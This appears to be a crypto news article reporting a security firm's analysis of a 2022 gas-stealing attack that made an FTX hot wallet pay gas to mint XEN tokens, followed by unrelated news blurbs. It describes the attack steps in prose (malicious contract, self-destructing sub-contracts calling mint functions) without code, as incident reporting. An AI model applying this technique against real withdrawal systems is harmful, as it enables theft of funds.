On October 13, 2022, according to Beosin’s EagleEye Web3 security monitoring platform, FTX exchange was under a gas stealing attack where it was manipulated to pay all the gas fees to mint a large amount of XEN tokens for the hacker.
In response to this attack, Coinlive invited Beosin, a Singapore-based Web3 security firm, to analyze the specific process of the exploit.
A few transactions of the attacks: 0xc96b84cd834655290aa4bae7de80a3c117cc19d414f5bcf2fb85b8c5544300890x8eb73bd5c08318a4cfd233940c3a58744830cda999e59ecbc56f094618a91d690x6bada8e084f8d3b62311f0b6eda10f2690e7542dab75a0de436a640036bccf94
One of the attacker's addresses: 0x1d371CF00038421d6e57CFc31EEff7A09d4B8760
One of the attacked contracts: 0xCba9b1Fd69626932c704DAc4CB58c29244A47FD3
The attacked FTX hot wallet address: 0xC098B2a3Aa256D2140208C3de6543aAEf5A94444
We will focus on one specific attack transaction as an example: (0x8eb73bd5c08318a4cfd233940c3a58744830cda999e59ecbc56f094618a91d69)
In the first step, the attacker deployed a malicious contract address on the chain (0xCba9b1Fd69626932c704DAc4CB58c29244A47FD3)
In the second step, the hacker used his FTX hot wallet address to transfer a small amount of funds to the malicious contract address (0xCba9...7FD3) and subsequently used this contract to create sub-contracts in batches.
Since many contracts are created in the entire attack, and each time the sub-contract is executed, the sub-contract will self-destruct, so the following figure is shown as an example.
In the third step, the sub-contract’s fallback() function would initiate a mint request to the $XEN contract. The claimRank() function passes in a term (>= 1 day) for minting, requiring only to pay gas fee of calling without any other costs associated.
The claimMintRewardAndShare() function is for claiming, which only determines whether the term is reached or not (in this case set to 1 day by the hacker), then it can be withdrawn unconditionally to any address. However, in this call process, the transaction initiator is the FTX hot wallet address, so the gas of the whole call process is paid by the FTX hot wallet address, and the $XEN mint address is the attacker's address.
The above three steps are repeated continuously in a cycle. Each time withdrawing the expired tokens and initiating a new minting request simultaneously.
This attack mainly takes advantage of the fact that FTX does not impose any restrictions on the recipient contract address, nor does it impose restrictions on the gas limit of ETH, this allows the hacker to exploit and mint $XEN tokens for profit.
At the time of publication, FTX exchange lost a total of 81 ETH and the hacker exchanged $XEN token for ETH transfer through decentralized exchanges like DODO and Uniswap.
Beosin’s Fund Movement and Tracing Chart
SphereOne and Rarible collaborate to streamline Web3 gaming and crypto payments, aiming to simplify deployment across multiple blockchains. Their partnership addresses conversion pipeline challenges and enhances accessibility for players.
MiyukiBitcoin surged to $52,079.00, hitting a two-year high driven by the success of U.S. spot bitcoin ETFs. Investor sentiment turned positive as the market cap crossed $1 trillion, with experts anticipating continued growth amidst increased demand and upcoming halving events.
JoyAllegations of cryptocurrency fraud involve South Korean celebrities and influencers linked to Winnerz, accused of running a coin scam. The controversy underscores the risks in crypto investments and emphasizes the importance of diligence and regulatory oversight.
JoyTwo Ethereum traders have made significant gains using the looping strategy, accumulating nearly $120 million amidst rising crypto prices. This tactic involves leveraging lending protocols to increase exposure to Ether, with the traders opting for a conservative approach to mitigate risks.
MiyukiNorth Korea's cyber espionage targeted a South Korean president's aide's personal emails, revealing breaches in security protocols. The incident underscores the urgent need for enhanced cybersecurity measures and international cooperation to mitigate cyber threats.
JoyNaver and Kakao merge to create Project Dragon Token, a new cryptocurrency set to leverage their extensive user bases. Despite initial challenges, the merger aims to consolidate Asia's blockchain market and inject vitality into the domestic coin industry.
WeatherlyMicrosoft found hackers from Russia, China, and Iran using AI tools from OpenAI for spying. Microsoft then banned these groups from accessing its AI products, stressing the need for better cybersecurity.
JoyDisney aims to tackle ticket fraud with a blockchain-based patent application, ensuring secure ticketing experiences. Industry experts highlight the potential of blockchain to enhance transparency and authenticity in Disney's ticketing system.
MiyukiWWE partners with Panini to introduce digital trading cards featuring wrestling icons on the blockchain, offering fans a new way to collect and engage with their favourite stars. Despite initial setbacks, WWE's venture into the NFT space holds promise for fans and collectors, with affordable pricing and plans for future releases.
WeiliangRevolutApp introduces $BONK incentive programme to educate users about crypto, pending DAO Council approval. The initiative aims to make crypto learning fun and accessible, highlighting the community-driven nature of the Solana ecosystem.
Joy